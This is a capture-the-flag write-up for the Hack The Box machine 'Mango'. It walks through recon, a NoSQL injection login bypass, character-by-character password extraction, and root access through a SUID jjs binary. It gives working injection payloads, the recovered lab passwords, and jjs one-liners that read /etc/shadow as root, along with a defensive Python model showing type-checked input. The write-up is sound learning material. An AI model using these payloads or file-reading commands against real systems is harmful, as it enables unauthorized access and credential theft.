[HTB] Mango — Write-up

Welcome to the HTB Mango write-up! This was a medium-difficulty Linux box. For the initial shell, a NoSQL injection against the MongoDB backend was leveraged to brute-force the users' passwords. For root access, a program configured with a permissive SUID bit was enough to escalate privileges. Let's get started!

Recon
_________________________________________________________________
Nmap
Let’s begin with an initial port scan using the following command:
$ nmap -Pn --open -sC -sV -p- -T4 10.10.10.162

Interesting ports to note:
- HTTP (80/TCP) — Forbidden page error. Directory brute-forcing did not find anything juicy

- HTTPS (443/TCP) — A Google-style search engine called “Mango”

Except for “Analytics,” all other links are non-functional. The “Analytics” page had some cool-looking charts as well as other functions. However, this was a rabbit hole and did not give me anything to exploit.

Next, I inspected the TLS certificate and found an additional domain, staging-order.mango.htb, under the Common Name (CN) field.

By adding this domain to the /etc/hosts file, we can now hit the delicious-looking login page.


Initial Foothold (MongoDB + NoSQL)
_________________________________________________________________
I did some directory brute-forcing and tried some basic SQLi attacks against the login; however, nothing came back with good news. My next thought was to guess, since HTB likes to name boxes as a hint sometimes. “Mango” sounded similar to MongoDB, so I did some Google searching for MongoDB exploits and came across an old MMACTF 2016 write-up, “MongoDB — Extracting data (admin password) using NoSQL Injection.” It described leveraging a NoSQL injection technique to bypass the authentication scheme and then enumerate users and their associated passwords. Sounds juicy like mango :)
NoSQL Injection Attack
First things first, I wanted to confirm that the login form and whatever backend DB sits behind it (although I was fairly convinced it would be MongoDB) are vulnerable to NoSQL injection. I used some example proof-of-concept (“PoC”) payloads from the CTF write-up as well as the PayloadsAllTheThings GitHub repository.

(1) Benign Login Attempt
I captured the login request, supplying the arbitrary credentials admin : admin, and the response came back as “200 OK,” which just returns us to the same login page.

(2) NoSQL Injection Attack to Bypass Authentication
When sending the following payload, we get a “302 Found” redirect response.
username[$ne]=admin&password[$ne]=admin&login=login

When we follow the redirect, we have successfully bypassed the authentication and can view the /home.php page.

The page was just a static error page saying “Under Plantation,” and there is nothing we can do with it. But what we can do further with a NoSQL injection against the database is dump valid credentials from it.

NoSQL Injection Attack — User Enumeration
From the above error page, we can see that the user “admin” seems to be valid. We can quickly confirm this by doing the following:
### Valid User
username=admin&password[$ne]=password&login=login --> 302 Found

### Invalid User
username=noOne&password[$ne]=password&login=login --> 200 OK

Knowing this, I used Burp Intruder with the rockyou.txt wordlist to enumerate valid users from the database and found the following two (2) users:
- admin
- mango

NoSQL Injection Attack — Extracting Passwords
Next, I modified the PoC script from the CTF write-up to extract the passwords for the valid users character by character. This exploit script can be found here.

Password found for “admin” user: t9KcS3>!0B#2

The password found for “mango” user: h3mXK8RhU~f{]f5H
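
To see why the `username[$ne]=admin` payload above works, and how the login should have handled it, here is an added example (not code from the write-up or from the box) that models how PHP-style bracket parameters become MongoDB operators, beside the type check that stops it. The user store and passwords are constructed sample data; the matcher covers only the `$ne` and `$regex` operators used in this write-up.

```python
"""Models the Mango login: PHP-style bracket parameters turn into
MongoDB operators unless the input is checked for plain strings."""
import re
from urllib.parse import parse_qsl

# Constructed sample user store standing in for the box's MongoDB collection.
USERS = [{"username": "admin", "password": "S3cretPass"},
         {"username": "mango", "password": "An0therPass"}]

def parse_php_params(query):
    """Mimic PHP's $_POST: 'username[$ne]=x' becomes {'username': {'$ne': 'x'}}."""
    out = {}
    for key, value in parse_qsl(query):
        m = re.fullmatch(r"(\w+)\[(.+)\]", key)
        if m:
            out.setdefault(m.group(1), {})[m.group(2)] = value
        else:
            out[key] = value
    return out

def field_matches(stored, cond):
    """Tiny subset of MongoDB matching: plain equality, $ne and $regex."""
    if not isinstance(cond, dict):
        return stored == cond
    if "$ne" in cond:
        return stored != cond["$ne"]
    if "$regex" in cond:
        return re.search(cond["$regex"], stored) is not None
    return False

def vulnerable_login(query):
    """Passes the parsed parameters straight into the query, as the box did.
    Returns the usernames the filter matches (non-empty means 302 Found)."""
    params = parse_php_params(query)
    return [u["username"] for u in USERS
            if field_matches(u["username"], params.get("username"))
            and field_matches(u["password"], params.get("password"))]

def hardened_login(query):
    """Rejects any parameter that is not a plain string before querying,
    so an operator object can never reach the database."""
    params = parse_php_params(query)
    user, pw = params.get("username"), params.get("password")
    if not isinstance(user, str) or not isinstance(pw, str):
        return []
    return [u["username"] for u in USERS
            if u["username"] == user and u["password"] == pw]
```

The `$regex` branch is what makes the character-by-character password extraction possible: a true/false match per guess leaks one character at a time, which is why the hardened version refuses anything but a string.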

User Access #1 (mango)
_________________________________________________________________
With the found credentials, we can now SSH into the box using the “mango” username and password.

However, the “mango” user does not have permission to read the user.txt flag.

User Access #2 (mango → admin)
_________________________________________________________________
Escalating to the “admin” user from “mango” was pretty simple. We can simply run su admin and, by providing her password, we now have access in the context of the “admin” user. We can also read the user.txt file.

Root Access
_________________________________________________________________
For the privilege escalation, I ran the LinEnum.sh script to quickly cover basic enumeration of the Mango box. It found the following interesting SUID file:

What is interesting about this file is that its owner is “root”; however, its group is set to “admin.” Since the setuid bit is set, whoever is allowed to execute the program runs it with the owner's (root's) privileges. The user “mango” cannot run the /usr/lib/jvm/java-11-openjdk-amd64/bin/jjs program because it lacks the proper permission, whereas the “admin” user can run it in the context of the “root” user.

GTFOBins — JJS Exploit
With a quick search on the GTFOBins site, I was able to find a PoC snippet to abuse the jjs program.

The script is pretty self-explanatory. Using it, you can basically read any file with root permissions.
### Reading /etc/shadow File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/etc/shadow"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

### Reading /root/root.txt File
echo 'var BufferedReader = Java.type("java.io.BufferedReader");
var FileReader = Java.type("java.io.FileReader");
var br = new BufferedReader(new FileReader("/root/root.txt"));
while ((line = br.readLine()) != null) { print(line); }' | jjs

Conclusion
_________________________________________________________________
This was a pretty straightforward box. I enjoyed the NoSQL attacking part and creating a Python script to brute-force the passwords using regex. The root part was a bit easy; however, it was a nice refresher on abusing SUID configurations. Thanks to the creator MrR3boot for making this fun box.
Hope you enjoyed my write-up, and thank you for reading!
